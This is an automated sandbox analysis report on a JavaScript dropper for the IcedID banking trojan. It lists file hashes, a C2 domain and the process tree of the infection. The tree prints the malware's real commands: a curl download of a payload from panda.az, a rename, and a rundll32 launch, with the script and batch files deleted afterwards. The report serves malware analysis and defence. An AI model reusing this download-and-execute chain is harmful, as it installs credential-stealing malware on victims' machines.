Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Document_0...358.js

windows7-x64

7

Document_0...358.js

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/08/2023, 19:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Document_08_22_83358.js

  • Size

    32KB

  • MD5

    b94169d7fcf7fb3ce08fa95e4676da37

  • SHA1

    f389244207b1f9804ea386586413c3fb84cb4e21

  • SHA256

    fd6bab35a50fe31eaa9c8ab86e61786c79a7b23dd447610ba1a9617e8267acbd

  • SHA512

    cbb56626ffe274fb4a1df0ead028800201b1910279f9581bd0503db7f42ed85b8b9006961d2f8ed01ea2d847097625f123d1244cea236204ecf28064a7208540

  • SSDEEP

    384:0gjih/zrnbNun0FJBEZyyZHVjv2AgpZyJpszYWk7Pqo5Vze4Cll6aogReLyxcB19:BiAs2ck2UskWe75AVdMt+kj68VrrAhwt

Score
10/10
icedid4089554921bankerloadertrojan

Malware Config

Extracted

Family

icedid

Campaign

4089554921

C2

manderatapple.com

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

    trojanbankericedid
  • Downloads MZ/PE file
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Document_08_22_83358.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:232
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Document_08_22_83358.js"
      2⤵
        PID:1664
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c echo curl https://panda.az/out/k.php --output "C:\Users\Admin\AppData\Local\Temp\deserunt.vinventore.v" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\deserunt.v.bat"
        2⤵
          PID:1576
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\deserunt.v.bat"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4412
          • C:\Windows\system32\curl.exe
            curl https://panda.az/out/k.php --output "C:\Users\Admin\AppData\Local\Temp\deserunt.vinventore.v" --ssl-no-revoke --insecure --location
            3⤵
              PID:1912
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\deserunt.vinventore.v" "deserunt.v"
            2⤵
              PID:4012
            • C:\Windows\System32\rundll32.exe
              "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\deserunt.v", vcab /k nutela746
              2⤵
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:2964
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\deserunt.v.bat"
              2⤵
                PID:2088

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\deserunt.v
              Filesize

              154KB

              MD5

              43c6293d4d2bc55571eb9855deabb28b

              SHA1

              05428db767fd3c6074f10b6017e173b02d54a89a

              SHA256

              35bd30d01b0a73863fd172fee24837463c79799996be26b78673b36beef95d98

              SHA512

              93d839273e5d18b179ff00a61a3bf5d17353eacc65e9af115790d426e4d9fe2bf9f6aec0d371ebace912352493ea1ce393a4b08bb77a483e3e0b8adf43751cfb

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\deserunt.v.bat
              Filesize

              139B

              MD5

              22096f7169216dd60d6e2b756e0e9660

              SHA1

              3baee5e37214fbbca6f079f7481db5708aa24e34

              SHA256

              5ddc1d081936c1af80eb7c3bd0054283b8817bbdc6c10dc01b2faaa32f97149d

              SHA512

              c67031fde049063f51e1764785552f147398881f18980767bbb5132bc29e5775d97064adf36b015c61a18437c9a7f5b1d7e15dbec7218cb8d3690bdf23654b46

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\deserunt.vinventore.v
              Filesize

              154KB

              MD5

              43c6293d4d2bc55571eb9855deabb28b

              SHA1

              05428db767fd3c6074f10b6017e173b02d54a89a

              SHA256

              35bd30d01b0a73863fd172fee24837463c79799996be26b78673b36beef95d98

              SHA512

              93d839273e5d18b179ff00a61a3bf5d17353eacc65e9af115790d426e4d9fe2bf9f6aec0d371ebace912352493ea1ce393a4b08bb77a483e3e0b8adf43751cfb

              Download Submit

            • memory/2964-138-0x00000289F23B0000-0x00000289F23B4000-memory.dmp

              Filesize

              16KB

              Download

            • memory/3288-139-0x00007FF8FDA71000-0x00007FF8FDA72000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3288-140-0x0000000180000000-0x0000000180009000-memory.dmp

              Filesize

              36KB

              Download

            • memory/3288-147-0x0000000180000000-0x0000000180009000-memory.dmp

              Filesize

              36KB

              Download

            • memory/3288-148-0x00007FF8FDA71000-0x00007FF8FDA72000-memory.dmp

              Filesize

              4KB

              Download